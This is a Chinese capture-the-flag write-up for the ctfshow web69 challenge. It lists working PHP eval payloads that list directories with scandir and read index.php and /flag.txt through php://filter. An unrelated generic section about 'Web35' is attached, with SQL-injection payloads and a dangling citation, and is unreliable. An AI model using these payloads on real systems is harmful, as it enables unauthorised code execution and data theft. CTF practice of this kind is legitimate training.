[ctfshow web入门] web69

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

查目录

百度了一下有哪些打印函数,var_export能用

  • var_export() 函数输出或返回有关变量的结构化信息。
    该函数的工作方式与 var_dump() 类似,不同之处在于该函数的返回值是有效的 PHP 代码。
c=var_export(scandir('.'));

在这里插入图片描述
或者换一个思路,用一个函数把array转成字符串,因为我发现printecho没被禁用

c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

implode(separator,array):implode函数返回一个由数组元素组合成的字符串。
join(separator,array):join函数是implode函数的别名。
在这里插入图片描述


读文件

flag不在flag.php,和之前一样,不是本篇重点,不再截图

c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));

在这里插入图片描述

c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

在这里插入图片描述


web68    目录    web70

### CTFShow Web 入门 Web35 的解题思路 CTFShow 平台中的 Web 类别题目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手分析并尝试解决。 #### 题目背景与目标 Web35 是一个典型的基于 GET 请求参数的注入类题目[^1]。通过访问页面可以发现存在动态加载的内容或者查询功能,这表明可能存在未经过滤的输入点用于执行恶意操作。具体来说,该题目的核心在于利用 URL 参数构造特定请求来绕过验证机制获取隐藏数据。 #### 技术要点解析 - **SQL Injection Basics**: 如果怀疑有 SQL 注射风险,则应测试各种特殊字符组合如 `'`, `"`, `--` 和其他可能影响语句逻辑的部分。当遇到错误反馈时更需注意调整payload试探数据库版本及结构信息。 ```sql ' OR '1'='1 -- ``` 上述代码片段展示了如何构建简单的布尔型盲注 payload 来改变原始查询条件从而达到控制结果集的目的。 - **Error-Based Exploitation**: 尝试触发异常响应以暴露更多关于内部工作流程的信息。某些情况下服务器会返回详细的错误描述有助于进一步确认假设方向正确与否。 - **Union Select Technique**: 当得知列数匹配情况之后可采用 union select 方法读取额外字段内容直至找到敏感资料为止。 ```sql ?param=1 UNION SELECT null,version(),database() ``` 此段示例说明了怎样运用union select技术从不同表里提取有用情报同时保持整体语法有效性的方法。 综上所述,在处理此类问题过程中要灵活应用多种技巧相互配合才能顺利通关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值